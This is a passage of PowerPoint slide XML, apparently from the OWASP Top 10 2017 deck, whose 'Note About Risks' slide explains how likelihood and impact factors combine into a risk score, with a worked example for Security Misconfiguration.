                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>Our methodology includes three</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>likelihood factors for each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>, detectability,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> and ease of exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>) and one</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> impact factor (technical impact). </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>The prevalence of a weakness is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Top 10 (the higher the result the higher the risk).  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0"/>
                        <a:t>Your organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> will have to decide how much security risk from applications and APIs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0"/>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>The following illustrates our calculation of the risk for A6:2017 Security Misconfiguration.</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383354302"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6324600"/>
          <a:ext cx="6629400" cy="2699887"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="625253">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="bg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a:solidFill>
                          <a:schemeClr val="bg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491782">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Specific</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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE</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ct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>App / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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489418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</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rPr>
                        <a:t>3</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1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Average=</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="0" dirty="0"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" kern="0" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3.0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rPr>
                        <a:t>3</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a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="0" baseline="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rPr>
                        <a:t>*</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rgbClr val="000000"/>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rPr>
                        <a:t>2</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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="8545588"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note About Risks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152400" y="6451798"/>
            <a:ext cx="5820810" cy="390006"/>
            <a:chOff x="46590" y="1058047"/>
            <a:chExt cx="5820810" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="46590" y="1058047"/>
              <a:ext cx="5820810" cy="386519"/>
              <a:chOff x="46590" y="1070390"/>
              <a:chExt cx="5820810" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257800" y="1070390"/>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00" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42"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a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43"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44"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45"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46"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a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="46590" y="1073624"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1189590"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>           Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>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41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="38" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="732390" y="1256471"/>
                <a:ext cx="457200" cy="1083"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 52974"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053"/>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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1357955" cy="727"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105A35D7-3B85-4A53-AF32-58A83A690AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="7696200"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4327DDFD-3A4D-4FEC-9751-B8F70C80FFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
